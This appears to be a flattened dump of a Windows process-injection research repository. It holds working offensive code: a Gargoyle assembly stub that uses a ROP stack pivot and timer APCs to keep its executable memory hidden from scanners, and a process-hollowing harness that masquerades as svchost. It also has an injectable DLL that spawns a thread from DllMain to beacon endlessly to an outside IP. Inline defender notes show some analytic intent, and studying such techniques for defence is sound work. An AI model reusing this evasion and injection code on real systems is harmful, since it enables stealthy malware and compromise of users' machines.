130 | Level3
131 | Use
132 | MaxSpeed
133 | true
134 | true
135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
136 | true
137 |
138 |
139 | Console
140 | true
141 | true
142 | true
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 | false
154 | Document
155 | nasm -f bin setup.nasm -o $(Configuration)\setup.pic
156 | $(SolutionDir)$(Configuration)\gadget.pic
157 |
158 |
159 | Document
160 | nasm -f bin setup.nasm -o $(Configuration)\setup.pic
161 | $(Configuration)\setup.pic
162 |
163 |
164 |
165 |
166 |
167 |
--------------------------------------------------------------------------------
/Gargoyle/Gargoyle.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/Gargoyle/ReadMe.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/Gargoyle/ReadMe.txt
--------------------------------------------------------------------------------
/Gargoyle/gadget.nasm:
--------------------------------------------------------------------------------
BITS 32

; Three-byte stack-pivot gadget. Assembles to 58 5C C3, the second entry of
; rop_gadget_candidates in Gargoyle.cpp; it is only used (via gadget.pic) when
; no copy of either pattern is found inside the donor system DLL.
pop eax
pop esp
ret
--------------------------------------------------------------------------------
/Gargoyle/setup.nasm:
--------------------------------------------------------------------------------
BITS 32

; Position-independent setup stub, assembled by the Gargoyle.vcxproj custom
; build step (`nasm -f bin setup.nasm -o $(Configuration)\setup.pic`) and
; mapped by allocate_pic() in Gargoyle.cpp. It imports nothing: every API it
; needs arrives as a pointer inside the Configuration block below.
;
; Defender note: between timer firings this stub is PAGE_READONLY (the
; VirtualProtectEx it jumps to at the end) and its thread sits in an alertable
; wait, so there is no executable private memory to scan; the persistent
; artefacts are the timer object, its completion routine pointing at the
; gadget, and esp pointing into the workspace allocation.
;
; This STRUC is the binary contract with Gargoyle.cpp: it equals `Workspace`
; there (the SetupConfiguration fields in order, then the 0x10000-byte stack,
; then the nine-dword StackTrampoline). Any field added or reordered on one
; side must be mirrored on the other. 32-bit only: every pointer is RESD 1.
STRUC Configuration
    .initialized:           RESD 1      ; 0 on first entry; set to 1 below
    .setup_addr:            RESD 1      ; base of this stub in memory
    .setup_length:          RESD 1
    .VirtualProtectEx:      RESD 1      ; API pointers filled in by launch()
    .WaitForSingleObjectEx: RESD 1
    .CreateWaitableTimer:   RESD 1
    .SetWaitableTimer:      RESD 1
    .MessageBox:            RESD 1
    .trampoline_addr:       RESD 1      ; address of .trampoline
    .sleep_handle:          RESD 1      ; waitable timer, created on first entry
    .interval:              RESD 1      ; timer period in ms
    .gadget:                RESD 1      ; pop ?; pop esp; ret — used as the timer completion routine
    .shadow:                RESD 2      ; scratch: due-time for SetWaitableTimer, old-protect out-param
    .stack:                 RESB 0x10000
    .trampoline:            RESD 9      ; VirtualProtectEx frame the gadget pivots onto
ENDSTRUC

; Call me like void (*__cdecl callable)(void* workspace);
; Entered directly from launch() on the first run, and afterwards via
; .trampoline's return address each time the timer APC fires.

mov ebx, [esp+4]                                ; Configuration in ebx now
lea esp, [ebx + Configuration.trampoline - 4]   ; Bottom of "stack" — esp now lives inside the workspace
mov ebp, esp

; If we're initialized, skip to trampoline fixup
mov edx, [ebx + Configuration.initialized]
cmp edx, 0
jne reset_trampoline

; Create the timer: CreateWaitableTimer(NULL, FALSE, NULL)
push 0
push 0
push 0
mov ecx, [ebx + Configuration.CreateWaitableTimer]
call ecx
mov [ebx + Configuration.sleep_handle], eax

; Set the timer: SetWaitableTimer(handle, &shadow, interval, gadget, trampoline_addr, FALSE)
push 0
mov ecx, [ebx + Configuration.trampoline_addr]
push ecx
mov ecx, [ebx + Configuration.gadget]
push ecx
mov ecx, [ebx + Configuration.interval]
push ecx
lea ecx, [ebx + Configuration.shadow]
push ecx
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
mov ecx, [ebx + Configuration.SetWaitableTimer]
call ecx

; Set the initialized bit
mov [ebx + Configuration.initialized], dword 1

; Replace the return address on our trampoline: the gadget's `ret` pops this
; slot and anything VirtualProtectEx then pushes lands on top of it, so it is
; rewritten before every firing.
reset_trampoline:
mov ecx, [ebx + Configuration.VirtualProtectEx]
mov [ebx + Configuration.trampoline], ecx

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Arbitrary code goes here. Note that the
;;;; default stack is pretty small (65k).
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Pop a MessageBox as example: MessageBox(NULL, "gargoyle", "gargoyle", MB_ICONINFORMATION)
push 0 ; null
push 0x656c796f ; oyle
push 0x67726167 ; garg
mov ecx, esp
push 0x40 ; Info box
push ecx ; ptr to 'gargoyle' on stack
push ecx ; ptr to 'gargoyle' on stack
push 0
mov ecx, [ebx + Configuration.MessageBox]
call ecx
mov esp, ebp ; discard the string built on the stack
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Time to setup tail calls to go down
;;;; Frames are built bottom-up so each stdcall callee returns into the next.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Setup arguments for WaitForSingleObjectEx x1: (sleep_handle, INFINITE, bAlertable=TRUE)
push 1
push 0xFFFFFFFF
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
push 0 ; Return address never ret'd

; Setup arguments for WaitForSingleObjectEx x2: same arguments
push 1
push 0xFFFFFFFF
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
; Return address for this call: falls through into WaitForSingleObjectEx x1 (tail call)
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx

; Setup arguments for VirtualProtectEx: (hProcess=-1, setup_addr, setup_length, PAGE_READONLY, &shadow)
lea ecx, [ebx + Configuration.shadow]
push ecx
push 2 ; PAGE_READONLY
mov ecx, [ebx + Configuration.setup_length]
push ecx
mov ecx, [ebx + Configuration.setup_addr]
push ecx
push dword 0xffffffff ; (HANDLE)-1, the current-process pseudo-handle
; Return address for VirtualProtectEx: falls through into WaitForSingleObjectEx x2 (tail call)
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx

; Jump to VirtualProtectEx — makes this stub read-only while the wait runs
mov ecx, [ebx + Configuration.VirtualProtectEx]
jmp ecx
--------------------------------------------------------------------------------
/Gargoyle/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/HollowingDropper/Debug/HollowingDropper.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/HollowingDropper/HollowingDropper.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {6DF3715B-102F-4B2F-8A47-F954478A017B}
23 | Win32Proj
24 | HollowingDropper
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
139 | true
140 |
141 |
142 | Console
143 | true
144 | true
145 | true
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
--------------------------------------------------------------------------------
/HollowingDropper/HollowingDropper.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 |
29 |
30 | Header Files
31 |
32 |
33 | Header Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/HollowingDropper/HollowingProcess.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/HollowingDropper/HollowingProcess.cpp
--------------------------------------------------------------------------------
/HollowingDropper/PE.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/HollowingDropper/PE.cpp
--------------------------------------------------------------------------------
/HollowingDropper/PE.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/HollowingDropper/PE.h
--------------------------------------------------------------------------------
/HollowingDropper/main.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 |
// Lab harness for the hollowing routine in HollowingProcess.cpp (not shown in
// this listing): spawns "svchost" hollowed with EXEPayload.exe, pauses for a
// keypress so the result can be inspected, then terminates it.
// Defender notes: the parent/child relation (this harness -> "svchost" with no
// path), a child whose in-memory image differs from its on-disk one, and the
// cmd.exe spawned by system("pause") are all visible to process telemetry.
// Defects:
//  * hProcess is never closed (CloseHandle) on either path.
//  * WaitForSingleObject(hProcess, 0) is a zero-timeout poll, so it does not
//    actually wait for the child to exit; use INFINITE or a bounded timeout.
//  * lpSourceFile is a developer-specific absolute path baked in at compile time.
//  * The (LPSTR) casts strip const from string literals to fit the callee's signature.
int main()
{
    cout << "Process Hollowing" << endl;
    LPSTR lpCommandLine = (LPSTR)"svchost";

#ifdef _WIN64
    LPSTR lpSourceFile = (LPSTR)"D:\\users\\sudo\\Documents\\GitHub\\ProcessInjection\\x64\\Debug\\EXEPayload.exe";
#else
    LPSTR lpSourceFile = (LPSTR)"D:\\users\\sudo\\Documents\\GitHub\\ProcessInjection\\Debug\\EXEPayload.exe";
#endif // _WIN64

    // Declared in stdafx.h; presumably returns NULL on failure, given the check below.
    HANDLE hProcess = CreateHollowedProcess(lpCommandLine, lpSourceFile);
    system("pause");

    if (hProcess)
    {
        TerminateProcess(hProcess, 4); // exit code 4; meaning not documented here
        WaitForSingleObject(hProcess, 0);
    }
    return 0;
}
--------------------------------------------------------------------------------
/HollowingDropper/stdafx.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | using namespace std;
4 | HANDLE CreateHollowedProcess(LPSTR lpCommandLine, LPSTR lpSourceFile);
5 |
--------------------------------------------------------------------------------
/HollowingDropper/x64/Debug/HollowingDropper.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Images/PE - Copy.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/Images/PE - Copy.jpg
--------------------------------------------------------------------------------
/Images/PEB.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/Images/PEB.jpg
--------------------------------------------------------------------------------
/InjectionDLL/Debug/InjectionDLL.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\injectiondll.pch
2 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\vc140.pdb
3 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\vc140.idb
4 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\stdafx.obj
5 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\dllmain.obj
6 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\injectiondll\debug\injectiondll.obj
7 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\injectiondll.lib
8 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\injectiondll.exp
9 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\injectiondll.ilk
10 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\injectiondll.dll
11 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\injectiondll.pdb
12 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\dllmain.obj
13 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.obj
14 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\stdafx.obj
15 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.pch
16 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\vc140.idb
17 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\vc140.pdb
18 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\cl.command.1.tlog
19 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\cl.read.1.tlog
20 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\cl.write.1.tlog
21 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\injectiondll.write.1u.tlog
22 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\link.command.1.tlog
23 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\link.read.1.tlog
24 | d:\users\sudo\documents\github\processinjection\injectiondll\debug\injectiondll.tlog\link.write.1.tlog
25 |
--------------------------------------------------------------------------------
/InjectionDLL/Debug/InjectionDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/InjectionDLL/InjectionDLL.cpp:
--------------------------------------------------------------------------------
1 | // InjectionDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "InjectionDLL.h"
6 | #include
7 | #pragma comment(lib,"Ws2_32.lib")
8 | #define MAX_MSG_LEN 1500
9 | void TryConnect();
// Exported entry (InjectionDLL.def: `Connect @ 1`), presumably started by the
// injector once the DLL is mapped into the target. Beacons forever: TryConnect()
// every 5 s. Never returns, so the hosting thread is tied up for the process
// lifetime.
// Defender note: a thread whose start address is an export of a module outside
// the process's usual module set, paired with this periodic outbound connect,
// is the observable.
void __stdcall Connect()
{
    while (1)
    {
        TryConnect();
        Sleep(5000); // 5 s between attempts
    }


}
20 |
// Best-effort connectivity beacon: opens a TCP socket, attempts one connect to
// 114.114.114.114:53 and immediately closes it. Nothing is sent or received.
// The results of socket() and connect() are deliberately ignored — a failed
// attempt is dropped silently and retried by Connect()'s loop.
// Defender note: an outbound TCP SYN to 114.114.114.114:53 every ~5 s is the
// network indicator.
// NOTE(review): identical copy of TryConnect() in EXEPayload/main.cpp; a
// shared source file would keep the two from drifting apart.
void TryConnect()
{
    WSADATA wsa;
    // Winsock 1.1 is requested; sufficient for a bare TCP connect.
    if (WSAStartup(MAKEWORD(1, 1), &wsa) != 0)
    {
        return;
    }
    SOCKET m_socket = socket(AF_INET, SOCK_STREAM, 0); // may be INVALID_SOCKET; unchecked
    SOCKADDR_IN SocketSendIn; // sin_zero is left uninitialized; it is padding that connect() ignores
    SocketSendIn.sin_family = AF_INET;
    SocketSendIn.sin_addr.S_un.S_addr = inet_addr("114.114.114.114");
    SocketSendIn.sin_port = htons(53);
    // sizeof(SOCKADDR) == sizeof(SOCKADDR_IN) (16 bytes), so the length is correct.
    connect(m_socket, (SOCKADDR*)&SocketSendIn, sizeof(SOCKADDR));
    closesocket(m_socket);
    WSACleanup();
}
37 |
38 |
--------------------------------------------------------------------------------
/InjectionDLL/InjectionDLL.def:
--------------------------------------------------------------------------------
1 | LIBRARY InjectionDLL
2 | EXPORTS
3 | Connect @ 1
--------------------------------------------------------------------------------
/InjectionDLL/InjectionDLL.h:
--------------------------------------------------------------------------------
1 | #ifndef InjectionDll_H_
2 | #define InjectionDll_H_
3 | #if (defined WIN32 || defined _WIN32 || defined WINCE) && defined InjectionDLL_EXPORTS
4 | #define InjectionDLL __declspec(dllexport)
5 | #else
6 | #define InjectionDLL
7 | #endif // InjectionDLL
// Exported worker entry (listed as ordinal 1 in InjectionDLL.def). Its
// definition in InjectionDLL.cpp loops forever, so callers must run it on
// a thread of its own (dllmain.cpp starts one from DLL_PROCESS_ATTACH).
InjectionDLL void __stdcall Connect();
9 | #endif // !InjectionDll_H_
10 |
11 |
--------------------------------------------------------------------------------
/InjectionDLL/InjectionDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
43 |
44 | Source Files
45 |
46 |
47 |
--------------------------------------------------------------------------------
/InjectionDLL/InjectionDLL.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/InjectionDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : InjectionDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this InjectionDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your InjectionDLL application.
9 |
10 |
11 | InjectionDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | InjectionDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | InjectionDLL.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General property page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named InjectionDLL.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/InjectionDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 | #include "InjectionDLL.h"
4 | #include
5 | #include
// Thread routine started by DllMain: hands control to Connect(), which
// never returns, so this function never returns either.
void WINAPI inj()
{
	Connect();
}
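// DLL entry point. On process attach it starts a worker thread running inj();
// on process detach it releases that thread's handle. Always returns TRUE.
//
// hModule / lpReserved are unused; ul_reason_for_call selects the action.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	// Must be static: DllMain is called once per reason code, so a plain
	// local would be NULL again by the time DLL_PROCESS_DETACH arrives and
	// the CloseHandle() below could never run (the original leaked the
	// handle for exactly that reason).
	static HANDLE hThread = NULL;
	DWORD dwThreadId = 0;
	(void)hModule;
	(void)lpReserved;
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		// NOTE(review): iostream output and CreateThread() here run under the
		// loader lock; kept as the author's debug output, but it is fragile.
		std::cout << "DLL_PROCESS_ATTACH" << std::endl;
		// inj is declared as void WINAPI inj(); the cast to
		// LPTHREAD_START_ROUTINE is carried over from the original code.
		hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)inj, NULL, 0, &dwThreadId);
		break;
	case DLL_THREAD_ATTACH:
		std::cout << "DLL_THREAD_ATTACH" << std::endl;
		break;
	case DLL_THREAD_DETACH:
		std::cout << "DLL_THREAD_DETACH" << std::endl;
		break;
	case DLL_PROCESS_DETACH:
		std::cout << "DLL_PROCESS_DETACH" << std::endl;
		if (hThread != NULL)
		{
			// Releases only our handle; the thread itself is not stopped.
			CloseHandle(hThread);
			hThread = NULL;
		}
		break;
	}
	return TRUE;
}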
45 |
46 |
47 |
48 |
--------------------------------------------------------------------------------
/InjectionDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // InjectionDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/InjectionDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 | #include "targetver.h"
8 | #include
9 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
10 | // Windows Header Files:
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/InjectionDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/InjectionDLL/x64/Debug/InjectionDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/InjectionDLL/x64/Release/InjectionDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 SudoZhange
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/MEMORY MODULE/.vs/MEMORY MODULE/v14/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/MEMORY MODULE/.vs/MEMORY MODULE/v14/.suo
--------------------------------------------------------------------------------
/MEMORY MODULE/Debug/MEMORY MODULE.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/MEMORY MODULE/Debug/MEMORY MODULE.tlog/unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/MEMORY MODULE/Debug/MEMORY MODULE.tlog/unsuccessfulbuild
--------------------------------------------------------------------------------
/MEMORY MODULE/Loader.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/MEMORY MODULE/Loader.c
--------------------------------------------------------------------------------
/MEMORY MODULE/Loader.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/MEMORY MODULE/Loader.h
--------------------------------------------------------------------------------
/MEMORY MODULE/MEMORY MODULE.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {9724121A-8D51-4686-BD83-45567A5E4229}
23 | Win32Proj
24 | MEMORYMODULE
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
139 | true
140 |
141 |
142 | Console
143 | true
144 | true
145 | true
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
--------------------------------------------------------------------------------
/MEMORY MODULE/MEMORY MODULE.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
